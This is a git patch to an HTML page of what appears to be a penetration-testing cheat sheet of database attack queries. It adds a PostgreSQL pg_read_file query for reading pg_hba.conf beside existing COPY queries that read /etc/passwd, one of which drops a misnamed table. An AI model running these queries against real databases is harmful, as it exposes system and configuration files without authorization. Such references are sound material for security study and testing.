From 499f36752c7c8b17dca9cae44464543032cf0dd7 Mon Sep 17 00:00:00 2001 From: Scott Sutherland Date: Thu, 7 Mar 2019 18:53:03 -0600 Subject: [PATCH] Added file read option for postgresql --- attackQueries/readingAndWritingFiles/postgresql.html | 10 ++++++++-- 1 file changed, 8 insertions(+), 2 deletions(-) diff --git a/attackQueries/readingAndWritingFiles/postgresql.html b/attackQueries/readingAndWritingFiles/postgresql.html index 9c48f2f..8f628af 100644 --- a/attackQueries/readingAndWritingFiles/postgresql.html +++ b/attackQueries/readingAndWritingFiles/postgresql.html @@ -13,14 +13,20 @@

Reading and Writing Files

- Read Files from Operating System + Read Files from Operating System - COPY CREATE TABLE mydata(t text);
COPY mydata FROM '/etc/passwd';
SELECT * FROM mydata;
DROP TABLE mytest mytest;
- + + + Read Files from Operating System - pg_read_file + + SELECT pg_read_file('/usr/local/pgsql/data/pg_hba.conf', 0, 200); + + Writing Files from Operating System